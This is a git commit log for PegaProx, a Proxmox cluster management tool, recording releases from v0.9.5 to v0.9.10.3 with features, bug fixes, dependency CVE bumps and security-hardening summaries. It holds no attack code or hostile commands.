- #417 keystore boot-loop on fresh installs + branch-aware installer
- #411 v2p disk-copy actionable stderr + chmod literal
- #412 OIDC opt-in private-IP allowlist + UI + 7-lang translations
- #413 Site Recovery boot-recovery sweep for stuck rows
- #414 cross-cluster migration pre-flight unused* warning
- #415 dashboard cpu_percent/mem_percent on /clusters/<id>/nodes
- #416 Clone VM target-node dropdown stability under auto-refresh
- #398 + #400 PVE → XCP-ng migration: qcow2 detection + qemu-img stdout
- #419 node Network In/Out via rrddata instead of cluster/resources
- #385 OVS bridge dropdown drops internal-port entries
- #365 generate-MAC honours Datacenter prefix
- #357 env-var control for log level + opt-out file log

Plus infrastructure: support-bundle journalctl fallback for
file-less installs.

Build: 2026.05.18, release_date 2026-05-18.

Release cut by Marcus (mkellermann97) while @MrMasterbay is out sick
through 2026-05-24. Earlier attempt today erroneously signed as
MrMasterbay (reverted in the preceding commit) — name correction
keeps git-log authorship factual.
2026-05-18 23:57:59 +02:00
mkellermann97
c873fb279e Revert "release: v0.9.10.3 (build 2026.05.18)"
This reverts commit 78b06bd238fc6d7aeddb04e508ee7e238cd1daad.
2026-05-18 23:56:14 +02:00
MrMasterbay
78b06bd238 release: v0.9.10.3 (build 2026.05.18)
Bundle the four-day-patrol fixes into a single hotfix release.
17 commits on Testing → main. See version.json changelog entry for
the full ticket-by-ticket summary. Headlines:

- #417 keystore boot-loop on fresh installs + branch-aware installer
- #411 v2p disk-copy actionable stderr + chmod literal
- #412 OIDC opt-in private-IP allowlist + UI + 7-lang translations
- #413 Site Recovery boot-recovery sweep for stuck rows
- #414 cross-cluster migration pre-flight unused* warning
- #415 dashboard cpu_percent/mem_percent on /clusters/<id>/nodes
- #416 Clone VM target-node dropdown stability under auto-refresh
- #398 + #400 PVE → XCP-ng migration: qcow2 detection + qemu-img stdout
- #419 node Network In/Out via rrddata instead of cluster/resources
- #385 OVS bridge dropdown drops internal-port entries
- #365 generate-MAC honours Datacenter prefix
- #357 env-var control for log level + opt-out file log

Plus infrastructure: support-bundle journalctl fallback for
file-less installs.

Build: 2026.05.18, release_date 2026-05-18.
2026-05-18 23:53:57 +02:00
mkellermann97
4844bf4c9b hotfix: v0.9.10.3 — fresh-install failure on the multi-tier keystore (#417)
Reported by @tgmct: every fresh v0.9.10 install where deploy.sh runs Step 5
(master-key bootstrap) results in pegaprox.service failing to start with
`PermissionError: [Errno 13] Permission denied: '/etc/pegaprox/secret.key'`.

Root cause: deploy.sh Step 5 wrote /etc/pegaprox/secret.key with mode
0600 root:pegaprox. The systemd unit runs as the `pegaprox` service user.
Owner is root, group is pegaprox, but mode 0600 grants read only to the
*owner* — the service user (a group member, not the owner) cannot read
its own master key. So every fresh install boot-loops.

Three-part fix:

(1) deploy.sh Step 5: master key now created at 0640 root:$SERVICE_GROUP
    (group-readable so the service can load it). Key directory is now
    0750 to match.

(2) deploy.sh Step 5: existing v0.9.10 / v0.9.10.1 / v0.9.10.2 installs
    self-heal on the next `update.sh` — if /etc/pegaprox/secret.key is
    found at mode 0600 or 0400, deploy.sh bumps it to 0640 and logs a
    `(#417 repair)` print_info. A key already at 0640 / 0440 is left
    untouched.

(3) pegaprox/core/keystore.py `_enforce_perms` was relaxed from "must be
    0600" to "must be 0600 OR 0640". Anything with group-write,
    group-exec, or any other-perm bit set is still rejected hard — the
    function raises RuntimeError, not silent skip, so an accidentally
    world-readable key never becomes the active key.

Hard rejection mask is now exactly `S_IWGRP | S_IXGRP | S_IRWXO`.
Accepted modes: 0600, 0400, 0640, 0440. Verified with 8-case unit pass.

docs/SECURITY.md tier table updated: Tier 4 row now states "chmod 0640
root:pegaprox — group-read required" and explains why 0600 root:pegaprox
is unreadable for the service. The "loose-perms" paragraph corrected
from "skipped" to "rejected" (matches the actual code behaviour).

Workaround for existing installs that hit the bug *before* this update
can be applied (i.e. operators stuck at boot-loop on v0.9.10/.1/.2):

  sudo chmod 640 /etc/pegaprox/secret.key
  sudo systemctl restart pegaprox

Files touched:
- deploy.sh (Step 5: 3x chmod 600 -> 640, dir 700 -> 750, repair-on-upgrade)
- pegaprox/core/keystore.py (_enforce_perms accepts S_IRGRP; docstring)
- docs/SECURITY.md (tier table + loader rejection wording)
- version.json, pegaprox/constants.py, web/src/constants.js, README.md
  (version bump to 0.9.10.3 / build 2026.05.15)
- web/index.html (frontend rebuild for new version constant)
2026-05-15 10:01:28 +02:00
MrMasterbay
11cffb3a6d hotfix: v0.9.10.2 — Corporate-layout button regression sweep + OIDC test hardening
Triggered by four customer reports filed within hours of the v0.9.10 release:
- #406 disk-resize modal showed hardcoded German labels in Corporate mode
- #407 Ceph monitor add — "Create" button appeared entirely non-functional
- #408 Ceph pool delete — trashcan silently failed, no toast, no task
- #409 generic "buttons are broken"

Root cause was systematic across the 1.4k-line Corporate UI bump:
27 user-action click handlers had `} catch (e) {}` silently swallowing every
error path. Modals stayed open with no feedback; destructive POST/DELETE
returned success-shaped UI even when PVE rejected the call.

All 27 sites patched to surface either PVE's actual error message or the
network exception:
- web/src/datacenter.js: Ceph pool create/delete, monitor add/delete,
  OSD action (out/in), OSD scrub, CephFS delete
- web/src/vm_config.js: 10 firewall option toggles, firewall rule
  enable/disable, firewall alias delete + create, firewall ipset delete
  + create, IP set CIDR add (modal + inline) + delete
- web/src/node_modals.js: node-detail OSD action + scrub

Plus the hardcoded German strings in the disk-resize modal
(`Aktuelle Groesse:`, `Vergroessern`) replaced with translation keys —
new `currentSize` key in DE/EN/FR/ES/PT/KO/IT, reused existing `resize`.

OIDC test endpoint hardening (#188 gerwin221 follow-up):
- `pegaprox/utils/oidc.py`: `get_oidc_endpoints()` now returns a structured
  dict with `_error`/`_error_detail` keys when the discovery URL gets
  rejected by the SSRF guard, instead of returning None and causing
  `AttributeError: 'NoneType' object has no attribute 'get'` downstream.
- `pegaprox/api/auth.py:oidc_test_connection`: null-guard + `_error` check
  with clean structured response, plus `client_id` access via `.get()` for
  KeyError safety.
- Accept `oidc_issuer` as alias for `oidc_authority` in the config-override
  loop (OIDC spec term).

Verification: 27 fixes verified via grep, frontend rebuilt and compiled
into web/index.html, 14-endpoint API smoke green (login, auth/check, users,
audit, clusters, plugins, alerts, version, security/status, settings,
reports/summary, reports/timeline, syslog/events, site-recovery). OIDC
test endpoint now returns HTTP 200 with structured error for 6 edge cases
that previously returned 500/empty-body. Server boot: 0 tracebacks.
2026-05-13 22:58:14 +02:00
MrMasterbay
bc4e336a8b hotfix: v0.9.10.1 — Aikido critical/high cleanup (SAST + dep CVEs)
- pegaprox/cli/migrate_db.py: two critical SAST findings (table names from
  sqlite_master embedded into SELECT COUNT(*) via f-string). Replaced with
  identifier whitelist (`^[A-Za-z_][A-Za-z0-9_]*$`) + escaped double-quoting
  via new `_safe_quote_ident()` helper. Practical exploitability was nil
  (no HTTP input path) but f-string SQL is an unconditional defense-in-depth
  no-go.

- requirements.txt: urllib3 floor 2.5.0 -> 2.7.0 (CVE-2026-44431 critical).

- requirements.txt: werkzeug floor 3.0.3 -> 3.1.6 covers CVE-2024-49767 (DOS,
  high), CVE-2024-49766 (path traversal, medium), CVE-2026-27199 (medium),
  AIKIDO-2024-10410 (weak encryption strength, low).

Open from the same Aikido report: 12 SAST 'SSRF via constructed URL' findings
on Proxmox / ESXi / XAPI passthrough calls (most look constrained server-side
but each needs case-by-case review), 1 'SSL verification off' for Proxmox
self-signed certs (architecture-by-design), 4 path-traversal patterns in
manager.py file-inclusion code, and one over-broad permission on
.github/workflows/docker.yml. Tracking for the next sweep.
2026-05-13 19:52:28 +02:00
MrMasterbay
edbd6e9fd0 release: v0.9.10 — SQLCipher full-DB encryption, LXC terminal, syslog scoping + dep hardening
Security
- Full-DB SQLCipher encryption (AES-256-CBC + HMAC-SHA512, format v4) on Linux x86_64.
  Auto-migrates plain DBs on first boot post-update (copy → sqlcipher_export →
  per-table row-count verify → atomic rename; timestamped .plain.bak retained).
  Graceful fallback to plain SQLite + Fernet field-encryption where the
  sqlcipher3-binary wheel isn't available (ARM/macOS/Windows).
- Multi-tier master-key loader: PEGAPROX_DB_KEY env → systemd LoadCredentialEncrypted
  → PEGAPROX_KEY_FILE → /etc/pegaprox/secret.key → ~/.config/pegaprox/secret.key →
  legacy CONFIG_DIR. Loose-perm files are skipped, never silently used. deploy.sh
  Step 5 generates the key outside config/ for fresh installs.
- Dependency floor bumps to clear pip-audit / Snyk findings: flask 3.0.3
  (werkzeug 3 RCE fix transit), flask-cors 6.0.0 (CWE-178 + 2 mediums),
  gevent 25.4.1 (CVSS 9.3 + 8.3 + 6.9), urllib3 2.5.0, paramiko 4.0.0,
  cryptography 46.0.7, h11 0.16.0, pyasn1 0.6.3, setuptools 78.1.1, zipp 3.19.1.
- 42-site reflected-content sanitizer (parse_pve_error html.escape) on Proxmox
  passthrough error paths across datacenter/vms/storage/static_files.

Features
- LXC dedicated text terminal — pct enter via PVE built-in termproxy API,
  wrapped through the existing SSH-WS transport. Server-side ticket mint, no
  shell exec on PegaProx side. vm.console permission gated, audit-logged.
- Cluster-scoped syslog viewer (#387, PR #399, contributed by @gyptazy, sponsored
  by credativ GmbH). Settings → Syslog Server tab with toggle; filters log rows
  by cluster's hostnames/nodes. i18n DE/EN/FR/ES/PT/KO.
- Corporate-layout enhancements across dashboard / VM modals / config tabs
  (~1.4k lines of new UI sources).

Operations
- Docker HEALTHCHECK start_period 15s→120s, retries 3→5 to give the
  in-process DB migration room on upgrade boot. Subsequent boots short-circuit.
- README: Aikido security audit badge.
- docs/SECURITY.md: new operator guide covering keystore tiers, migration tool,
  recovery story, and systemd LoadCredentialEncrypted (TPM2-bound) setup.
2026-05-13 19:18:13 +02:00
mkellermann97
171a2df865 hotfix: v0.9.9.3 — version.json update_files manifest correction (#383)
Closes #383 (mbunkus): pegaprox/api/dr_drill.py + 18 other files
were on disk and shipped via the GitHub archive, but missing from
the per-file update_files list in version.json. When the updater
fell through to the file-by-file fallback path (mirror 404, archive
download glitch, anything), those files never landed and the service
refused to start at import time.

Files added to update_files (19):

  pegaprox/api/dr_drill.py                                  [#383 fix]
  plugins/hello_world/__init__.py
  plugins/hello_world/manifest.json
  plugins/proxmox-ha/__init__.py
  plugins/proxmox-ha/manifest.json
  plugins/proxmox-ha/README.md
  images/pegaprox-logo-dark.png                              [theme-aware logo set]
  images/pegaprox-logo-light.png
  images/pegaprox-logo-square-dark.png
  images/pegaprox-logo-square-light.png
  images/sponsors/banner_oranje.png                          [Expertize sponsor]
  images/sponsors/sponsor3.png
  images/sponsors/sponsor3-icon.png
  images/sponsors/sponsor3-mark.png
  SECURITY.md
  misc/grafana/README.md                                     [Grafana dashboards]
  misc/grafana/pegaprox_grafana_dashboard_v1.0.json
  misc/grafana/pegaprox_grafana_dashboard_v1.1.json
  web/Dev/static/js/html2canvas.min.js                       [PDF/PNG export dep]

Coverage post-fix: 100 % (215 shippable files on disk all in
update_files; 0 missing, 0 orphans).

Pre-release CI check to permanently close this hole is in flight
as a separate work item — diff find pegaprox plugins images misc
-name '*.py' -o -name '*.json' etc. against jq -r .update_files[]
version.json, fail tag if mismatch.
2026-05-08 13:43:52 +02:00
mkellermann97
236636db26 hotfix: v0.9.9.2 — OIDC admin lockout regression in v0.9.9.1
The TOTP step-up gate added in 0.9.9.1's verify_password_api was
strictly fail-closed for OIDC/Entra users without TOTP enrolled.
Problem: PegaProx already blocks OIDC users from enrolling TOTP at
/api/auth/2fa/setup ("2FA is managed by your OIDC provider"). So
strict TOTP-only re-auth = OIDC admins locked out of any re-auth-
gated operation. Reported by user immediately after release.

Fix: three-tier ladder for OIDC re-auth, in order of preference:

  1. WebAuthn proof (works regardless of auth_source — admins can
     enrol independently in Settings → Account → Security keys).
     Returns 'requires_webauthn' on missing proof, 'Invalid
     WebAuthn proof' on bad token, 200 success on accept.

  2. TOTP code if the user happens to have a totp_secret (covers
     ex-local users that were later converted to OIDC). Returns
     'requires_totp' on missing code, 'Invalid TOTP code' on bad
     code, 200 on accept.

  3. Session-validity fallback when neither is enrolled. Logs an
     INFO-level warning recommending WebAuthn enrolment so the
     soft state is in the audit trail. Stolen-cookie risk that
     0.9.9.1 was meant to address remains in this path; proper
     fix needs OIDC `prompt=login` redirect flow which is bigger
     scope and tracked separately.

Non-admin OIDC users remain blocked at "Admin access required"
before any of the three paths runs, so the gate isn't loosened
for non-privileged accounts.

All seven scenarios verified against the running app via mock
test (rate-limit reset between runs).
2026-05-08 09:18:12 +02:00
mkellermann97
c8f5bb7d03 release: v0.9.9.1 — security hardening + plugin frontend system
A focused follow-up release on top of v0.9.9. The bulk is security
hardening (CSRF, XXE, OIDC re-auth, plugin manifest sanitisation),
plus first-class support for plugin frontend UIs (#381) and three
issue fixes from community reports (#380, #381, #382).

Security
- CSRF Origin matcher rewritten to use urllib.parse instead of
  string startswith() — closes a suffix-confusion vector (#382)
  and is now scheme-agnostic so Apache/nginx setups without
  X-Forwarded-Proto forwarding stop hitting false-CSRF errors.
  Hardened against urlparse normalising tabs in scheme,
  non-http(s) schemes, userinfo confusion, port mismatches.
- XML parsing in core/xcpng.py switched to defusedxml — closes
  XXE / billion-laughs / external-entity expansion in iSCSI
  probe and RRD payloads.
- paramiko floor 3.4.0 (CVE-2023-48795 Terrapin), urllib3 floor
  2.0.7 (CVE-2023-43804 cookie redirect leak).
- OIDC / Entra admin re-authentication for sensitive ops now
  requires TOTP step-up. Previously a stolen session cookie
  passed the gate. Admins without TOTP enrolled hit a
  fail-closed 'requires_totp_setup' response.
- Status Page + Client Portal plugin HTMLs hardened: strict CSP,
  setHTMLSafe() single audit point via detached <template>,
  Number()-cast on all numeric CSS attribute interpolations.

Plugin frontend system (#381)
- list_plugins() exposes has_frontend / frontend_route from
  manifest.json so the dashboard can render a plugin tab without
  core changes per plugin. Server-side route validation rejects
  external URLs, control characters, query/fragment injection,
  parent traversal, and cross-plugin path hops.
- Generic plugin frontend tab in the dashboard — sandboxed iframe
  (no allow-top-navigation, encodeURIComponent on theme/cluster
  params). Manifest declares relative ('ui') or full path
  (/api/plugins/<id>/api/...); everything else is rejected.
- Security headers relaxed from DENY/'none' to SAMEORIGIN/'self'
  for X-Frame-Options + frame-ancestors to enable the iframe
  contract — cross-origin clickjacking remains blocked.

UX / community fixes
- Disconnect / offline banner now shows the affected cluster and
  node names (truncated past three with '+N more') instead of a
  bare count (#380). Translated into all 7 supported languages.
- Theme-aware logo switching: Modern dark / Corporate dark use
  white-pegasus, Corporate light uses dark-pegasus. PDF export
  uses dark-pegasus for white-paper print.

Plus seven deferred Marcus / Semgrep patches that were sitting
in the local queue: tenant ACL on templates_lib deployment_status,
cluster-access check on search.py remove_vm_tag, _no_agent_vms TTL
in core/manager.py (#375), HA-rules-first / groups-fallback for
PVE 9.1.x (#372), PBS scoping on settings.py (#376), R²+slope
sanity bound on insights capacity warnings (#374), Cache-Control
+ shlex.quote tightening on a handful of API endpoints.
2026-05-08 09:05:03 +02:00
mkellermann97
2617b8372b release: v0.9.9 — FinOps, Sustainability, DR Drills, PWA + comprehensive Security Audit
Big release. New top-level features:
- Cost Dashboard / Chargeback — per-VM/tenant rollup, price book, recommendations, PDF + CSV export
- Power & Carbon Tracking — Redfish/IPMI/RAPL aggregation, kWh + CO₂e dashboard, PDF + CSV
- Network Topology Visualization — interactive nodes/bridges/bonds/VLANs/VMs map
- Snapshot Schedules — per-VM or per-tag cron with retention (count + age), 60s tick scheduler
- Config Drift Detection — 6h fingerprint scanner with sorted-CSV normalisation (no false positives on tags/content/nodes)
- SIEM Forwarder — Syslog (UDP/TCP, RFC 5424), Splunk HEC, Elasticsearch, Loki, generic webhook; per-target TLS verify, retry queue
- Cloud-Init Template Library — curated upstream cloud images + custom URL/upload, hardened deploy path
- PWA + Web Push — installable app, offline shell cache, VAPID push (no third-party gateway)
- Insights tab — capacity ETA, fragmentation, idle/oversized VMs, power outliers + PDF export
- Audit Search v2 — faceted full-text + CSV export, fail-closed HMAC chain incl. cluster + severity
- DR Drill Wizard — read-only 11-check structured dry-run for Site Recovery plans, JSON + PDF report

10 new blueprints registered; 4 background workers (drift scanner, SIEM forwarder, snapshot scheduler, push handler) — all idempotent + restart-safe.

Comprehensive security audit (3 rounds):
- C-1: command injection in template library — shlex.quote() + URL/regex whitelist
- H-1: CSRF skip on JSON POSTs — Origin/Referer enforced on every state-changing /api/*
- H-2: 21 transitive CVEs — cryptography 47, requests 2.33.1, pyOpenSSL 26.1, PyJWT 2.12.1, pyasn1 0.6.3, pillow 12.2.0; pip-audit clean
- M-1: VAPID private key encrypted at rest (AES-GCM, transparent migration)
- M-2: audit HMAC includes cluster + severity, fail-closed (legacy 5-field fallback for pre-0.9.9 entries)
- M-3: 17 str(e) leaks replaced with logging.exception() + generic message
- M-4: SIEM TLS verify per-target, default true (removed hardcoded verify=False)
- M-5: opaque session revocation token, constant-time compare
- M-10: V2P password scrubbed on phase=completed/failed
- M-11: webhook URL credential redactor before logging
- M-12: push endpoint host whitelist (RFC1918/loopback/metadata refused)
- B-1: api/push.py used flask.session instead of request.session (every push endpoint 401'd) — replaced with _current_user() helper

Air-gap mode hardening:
- /-route now injects localStorage flag prelude server-side when air_gap_mode=true so the very first page load on a fresh browser doesn't hit cdn.jsdelivr while waiting for /auth/check
- html2canvas onerror handlers (4 spots) refuse CDN fallback when air-gap is on
- html2canvas shipped locally (static/js/html2canvas.min.js)

Bumps:
- pegaprox/constants.py + web/src/constants.js → Beta 0.9.9, build 2026.05.03
- version.json → 0.9.9, update_files now 200 entries
- README.md extended with new feature sections; "What's New" block dropped in favour of GitHub releases as source of truth
- i18n: every new feature shipped in DE/EN/FR/ES/PT/KO/IT
2026-05-03 23:39:39 +02:00
mkellermann97
8f6dd426ff release: 0.9.8.2 — VNC for PVE 9.1.x, AD/LDAP fixes, audit-report i18n
- VNC: lenient WS opening-handshake recovers stripped Upgrade token (#352)
- VNC: single-vncproxy mode for PVE 9.1.x — JS ticket+port reused server-side so
  noVNC's RFB password matches PVE's per-call random password (#352 follow-up)
- VNC: optional Stable Mode (AES-256-GCM) + SSH-tunnel + HTTPS-polling
  fallback for environments with TLS-inspection / EDR byte-mangling
- Backup task edit: strip read-only fields, convert dict-shaped fields to
  PVE property-strings (#338)
- Replication: VM Configure tab now shows actual last_sync (#333)
- Datacenter → Replication: clearer hint about cross-cluster path (#320)
- Pool member assign: idempotent + real PVE error surfaced (#349)
- Site Recovery readiness: free-memory math fixed (#350)
- LDAP/AD: nested group expansion (LDAP_MATCHING_RULE_IN_CHAIN), fixes
  Built-in/Domain Users role mapping (#353)
- Config backup/restore: LDAP users re-bind to IdP for password verification
  instead of comparing to non-existent local hash (#355)
- Cert mgmt: hardcoded German placeholders translated (#354)
- VM create: ostype list aligned with PVE 9.1 (#358)
- Audit Report: 524 missing translation keys filled across DE/EN/FR/ES/PT/IT
- Stable VNC toggle: React state + flex-shrink-0 fixes the visual jiggle
2026-04-30 00:26:08 +02:00
mkellermann97
e23fe7847b release: 0.9.8.1 — audit-grade compliance PDFs, hardening fixes, log rotation
Compliance Dashboard
- Per-framework PDF restructured to a real audit-report layout (cover, disclaimer
  up front, executive summary with posture rating, top findings, scope of
  assessment, methodology, findings by severity, per-node coverage, per-family
  detail with severity column, appendix B remediation plan with priority and
  recommended timeline, appendix C evidence with verbose check output,
  appendix D glossary).
- Real CMMC L1/L2 (NIST 800-171), NIST 800-53 Mod, DISA STIG, ISO 27001:2022
  Annex A, BSI Grundschutz, VS-NfD control IDs mapped to PegaProx internal
  checks (47 controls × 7 frameworks). Lives in core/compliance_mapping.py.
- Per-control severity (high/medium/low/informational) and remediation
  timeline (within 30 / 90 / 180 days).
- "PegaProx control" column in the per-family / remediation tables matches
  the checkbox names in Settings → Compliance → Harden PVE Node, with an
  explicit operator-handoff note.
- New API endpoint GET /api/compliance/mapping serves the data structure.

Hardening
- pw_quality now wires pam_pwquality.so into /etc/pam.d/common-password.
- pw_history avoids use_authtok unless pwquality is configured ahead of it,
  preventing "Authentication token manipulation error" on every passwd call.
- New control: pam_password_repair (Repair PAM password stack — recovery)
  detects + fixes the broken stack in one click. Idempotent on healthy
  systems.

Logging
- Per-cluster operational log capped at 3h via new
  utils/log_handler.CappedTimedFileHandler (#345, #348). Audit log unaffected.
- SSH error log now shows the real stderr line instead of the SSH
  banner-padding asterisks.

Bugfixes
- Modern Layout Re-configure Cluster icon now works — setReconfigureCluster
  prop was missing in ClusterSidebarItem (#346).
- Manifest carry-over from #344: 4 new 0.9.8 modules in update_files.

Sponsors
- New Silver Sponsor: uvensys GmbH.
2026-04-28 00:16:59 +02:00
mkellermann97
5b76837e35 fix: cap per-cluster log file at 6h to stop disk fill (#345, #348)
We were using a plain logging.FileHandler with no rotation, so on busy
clusters (20+ nodes) the per-cluster .log can grow ~100 MB/h until disk
runs out — the supplied VM image hit this in #348.

New CappedTimedFileHandler in pegaprox/utils/log_handler.py: rotates
every 6h and discards the rotated content (we don't need historical
operational logs, audit log is separate). Disk use bounded at ~one
hour-bucket of writes, regardless of cluster size or activity.

Wired in for both PegaProxManager and XcpngManager. log_handler.py
added to update_files so update.sh actually pulls it.
2026-04-27 17:42:41 +02:00
mkellermann97
ba2f25c864 fix: include 4 missing 0.9.8 modules in update_files (#344)
webauthn.py, metrics_exporter.py, ssh_pool.py and webhooks.py were
added in 0.9.8 but not registered in version.json's update_files list,
so the incremental updater skipped them. Fresh installs and
update --force runs were unaffected (full archive sync), but every
0.9.7 -> 0.9.8 in-place upgrade failed at boot with
ModuleNotFoundError on the webauthn import.
2026-04-27 12:10:35 +02:00
MrMasterbay
5383287b96 release: 0.9.8 — Compliance, V2P VirtIO injection, SSH stabilization, security fixes
* Compliance Dashboard (top-level tab) with CMMC L1/L2, NIST 800-53, DISA STIG,
  BSI Grundschutz, ISO 27001, NIS2, VS-NfD coverage cards + downloadable PDF
  reports per framework. Backend + frontend mappings stay in sync.
* Hardening: 9 framework profiles (cis-l1/l2, vs-nfd, bsi, iso, nis2, cmmc1/2,
  nist53, stig) selectable from Harden PVE Node UI. Live progress per control
  during apply, queued/inFlight/justApplied/applied per-card states.
* Hardening: root + pegaprox always exempted from pam_faillock / pw_aging /
  session_limit / inactive_accounts. Optional input for additional service
  accounts (monitoring, backup) — does not lock PegaProx out of its own nodes.
* fail2ban: PVE 8 (Debian 12) + PVE 9 (Debian 13) compatible. Detects Debian
  major and picks iptables-multiport vs nftables-multiport. systemd backend,
  journalmatch on pvedaemon/pveproxy, no /var/log/daemon.log dependency.
* V2P: opt-in offline VirtIO driver injection (viostor / vioscsi / NetKVM /
  Balloon / pvpanic / vioserial / viorng). Storage-aware dispatch — works
  across LVM/iSCSI, ZFS zvol, Ceph RBD, NFS/CIFS qcow2 (qemu-nbd / rbd map /
  losetup -b 512). Windows boots straight on virtio-scsi-pci, no BSOD.
* Air-gap mode: settings toggle disables update-mirror checks + external CVE
  lookups. OpenCollective links + sponsor logos remain visible.
* Audit log retention configurable via Compliance settings (30-3650 days, BSI
  Grundschutz recommends 180+).
* SSH stabilization (Phase 1): bounded parallel fanout for multi-node ops via
  utils/concurrent.run_per_node — 15-node custom-script runs in ~1-2 min
  instead of 15. HA paths in core/manager.py untouched.
* SSH stabilization (Phase 2): OpenSSH ControlMaster + paramiko Transport pool
  in pegaprox/utils/ssh_pool.py. ESXi hammer-loops during V2P drop ~74 % in
  latency (cold 762 ms → warm 195 ms verified). Graceful fallback if socket
  dir not writable. HA-critical SSH paths intentionally untouched.
* Security fix (HIGH): iSCSI CHAP shell injection in datacenter.py — strict
  regex validation + shlex.quote() defense-in-depth on target/portal/username/
  password. Discovered + fixed during in-house red-team audit.
* Storage UI: shared storage with partial node reachability shows "active on
  pve1, unreachable from pve2" badge. iSCSI raw correctly distinguished from
  unreachable (active=1, total=0 → "raw" pill, not false "unreachable").
* Frontend: Compliance Dashboard scoped to selected cluster only (no
  fan-out SSH probes across all clusters). New "Compliance & Hardening"
  card in Settings → Compliance tab (audit retention slider + air-gap toggle).
* Misc: V2P ESXi keepalive thread (every 4 min) prevents idle SOAP timeout.
  ESXi connection auto-reconnects on stale sessions. Live-progress for
  hardening apply (8/15: ssh_crypto). Storage-tab partial-reachability node
  switcher when shared storage is reachable from a subset of nodes.
* IDK Manager added as Bronze sponsor in README.md.
2026-04-26 21:50:47 +02:00
MrMasterbay
8ff4254ce1 release: 0.9.7.1 — V2P near-zero downtime + ESXi reliability + bugfixes
* V2P transfer modes: sshfs_boot live-mirror, snapshot_zero iterative delta,
  cleaner offline path. Multi-disk Windows / Linux VMs verified end-to-end.
* 4K iSCSI LUN guests boot post-V2P (logical_block_size=512 emulation per disk).
* OVMF NVRAM persists (efidisk0 + pre-enrolled-keys=1 for Windows).
* BOOTX64.EFI fallback registered so Windows boots without nvram entries.
* VMware: REST→SOAP fallback, snapshot create/delete, guest power, sector probes.
* ESXi keepalive: periodic session ping every ~4 min + auto-reconnect on stale
  sessions (fixes "PegaProx loses ESXi connection over time" reports).
* V2P failure recovery: source VM resumed if cutover crashed mid-suspend, named
  v2p_* snapshots cleaned alongside the migration snap.
* Italian translation (#332)
* PBS Reports tab — executive summary, inventory, gap analysis, PDF/PNG (#273)
* Rolling update with --with-local-disks evacuation, HA-rerouted migrations no
  longer false-fail (#330, #340)
* Scheduled actions: name + vm_type now persist (#337)
* Site Recovery: OVS bridges + SDN vnets in mapping dropdown (#329)
* OIDC Authentik: stricter discovery + skip-tls-verify toggle (#188)
* Webhook alerts: Slack/Discord/Teams/ntfy/generic JSON dispatcher
* Prometheus /api/metrics exporter
* WebAuthn / FIDO2 second-factor
* Security: uniform 401 + dummy_verify_password (timing equalization),
  X-Forwarded-For canonicalization (::ffff: IPv4), SVG magic-byte guard
* misc: excluded-VMs button clipping, RFB-layer VNC keepalive (#335, #312)
2026-04-25 19:12:58 +02:00
mkellermann97
d68a399289 release: 0.9.7 Beta
- SSH reachability overhaul for corosync-VLAN setups (#324) — every
  node SSH op now resolves the real mgmt IP, probe is on ssh_port,
  single-node ?node= path in cluster-creds, 3-probe cap to stay under
  WS timeout, safer final host fallback. Adopted from remipcomaite
- Node Hardening PDF/PNG export — CIS / Lynis / STIG / PegaProx
  audit report with stats, per-source tables, optional verbose
  evidence section
- KSM Sharing visible in Node Summary, always shown (matches native
  PVE UI); backend normalizes shared to an int
- CVE Scanner: failed-scan nodes no longer show as green '0 CVEs' —
  grey dash with failed count instead
- CVE Scanner: breathing room in corporate layout (taller stat
  cards, bigger gap, label spacing)
- Rolling Update: reboot_timeout now exposed in the UI next to
  evacuation_timeout — useful for Ceph OSDs / slow-boot nodes (#328)
- Corporate dashboard: single-node clusters show 'Standalone'
  badge instead of red 'Quorum verloren' (#326)
- Disk Create modal: native select dropdowns no longer dismiss the
  modal on click (#323)
- Translations: verbose audit output, KSM sharing, reboot timeout,
  several DE/EN/FR/ES/PT/KO keys
2026-04-19 21:22:02 +02:00
MrMasterbay
2deef5579e fix: remove #310 from changelog (console resize reverted) 2026-04-15 00:18:56 +02:00
MrMasterbay
364a2c3657 v0.9.6.1 — PBS Update Manager, VM Wizard fixes, OIDC + time format
- bump version to 0.9.6.1 (build 2026.04.14)
- changelog updated with 11 new entries
- prev_changelog rotated from v0.9.6
2026-04-14 21:56:10 +02:00
mkellermann97
eb3c17aa72 fix: remove VMware/EVC trademark references from UI and code
Replaced all user-facing "VMware DRS" with "DRS-style" and "EVC Mode"
with "CPU Compatibility Mode" across all 6 languages. Internal code
comments also cleaned up.
2026-04-12 20:55:56 +02:00
MrMasterbay
c69103e81c v0.9.6 — Predictive LB, ESXi Wizard, ISO Sync, Security Hardening
- Predictive Load Balancing + CPU EVC compatibility mode
- ESXi migration 3-step wizard with 28 configurable options
- ISO/Template Sync across cluster nodes
- Push Notifications plugin (Ntfy + Apprise)
- Client Portal: ISO mount, Force Stop, Ctrl+Alt+Del, OIDC login
- Status Page: incidents, uptime tracking, maintenance banner
- Syslog: FTS5 search, redesigned UI, PDF export
- Corporate light mode polish (~90 CSS overrides)
- 12 security hardening fixes
- 15+ bug fixes (#192, #222, #253, #272, #274, #276, #278, #279, #281, #288, #289, #290, #292, #294, #295)
2026-04-12 12:51:39 +02:00
MrMasterbay
cd44e39f57 feat: Predictive Load Balancing, CPU EVC, PDF templates, portal & status page improvements
- Predictive Load Balancing with trend analysis (DRS-like), configurable score weights (CPU/RAM/IO)
- CPU EVC compatibility mode: pre-migration CPU vendor/model checks, cluster baseline enforcement
- CPU compatibility matrix API for migration safety visualization
- Professional PDF export template (jsPDF + autoTable) replacing browser print dialogs
- Client Portal: dashboard overview, VM search/filter, XSS fixes, custom confirm modals,
  VNC loading state, skeleton loaders, light theme toggle, OIDC/LDAP login support
- Status Page: incident timeline, uptime tracking (90-day bar), maintenance banner,
  component-level status, embeddable SVG status badge
- User Management: folder system for organizing users, pagination (15/page),
  admin portal_only protection (prevents lockout)
- Sponsor: netwolk GmbH as first Platinum Sponsor
- Fix: cross-cluster migrate bridge mapping format (#274) — was using = instead of :
- Fix: OIDC callback now includes portal_only + redirect_after for portal SSO flow
2026-04-09 08:16:38 +02:00
MrMasterbay
a0cd8b8f68 v0.9.5 — Client Portal, Status Page, Syslog, Security Hardening
- Client Portal plugin: self-service VM management for hosting customers
- Public Status Page plugin: cluster health for monitoring screens (#126)
- Integrated syslog server (UDP/TCP port 1514) with log viewer (PR #257, gyptazy)
- External ACME CA support — custom directory URLs e.g. StepCA (#249, PR #258, gyptazy)
- Markdown VM descriptions with edit/preview toggle (PR #263, newtscamander2)
- Inline tag selector with Proxmox tag dropdown + validation (PR #263)
- Node/tag filter dropdowns in Resource Management (PR #263)
- Plugin config editor (JSON textarea in Settings UI)
- portal_only user flag, VNC audit logging, portal actions in task bar
